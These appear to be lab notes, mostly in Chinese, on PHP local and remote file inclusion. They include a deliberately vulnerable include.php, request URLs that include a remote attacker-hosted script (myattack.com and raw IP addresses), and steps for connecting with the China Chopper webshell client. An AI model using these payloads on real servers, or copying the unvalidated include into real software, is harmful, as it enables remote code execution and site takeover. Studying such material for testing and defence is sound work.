

include.php:
========================================================
<h3>Welcome to the php-include file test page</h3><hr>
<p>
  Parameter: filename;<br>
  method: GET;<br>
  directory: include;<br>
  function: include<br>
</p>

<?php
  $file = $_GET["filename"];
  include($file);
?>
========================================================


本地文件包含
--------------------------------------------------------
浏览器访问：http://www.xxx.com/include.php?filename=a.jpg

使用普通菜刀无法连接，chopper2号，中国菜刀，可以连接




远程文件包含：
--------------------------------------------------------
php.ini配置文件需要开启下面一项：
allow_url_include = on;
重启apache服务

浏览器访问：http://www.xxx.com/include.php?filename=http://myattack.com/r.php

然后使用菜刀去连接这个URL，你会发现所有的菜刀都无法连接成功，因为他把r.php当成xxx.com服务器上的本地文件了

这个算是菜刀的一个小bug，虽然返回码是200，但是是没有任何操作权限的，只需要将远程的r.php 改成其他后缀如.txt .jpg 即可

然后继续访问：http://118.89.51.198/lzx/include/include.php?filename=http://39.108.112.100/test.txt 就可以连接了




一些包含函数：
--------------------------------------------------------
php:
  include()
  include_once()
  require()
  require_once()
  fopen()
  readfile()

jsp
  java.io.file()
  java.io.filereader()

asp
  include file
  include virtual...
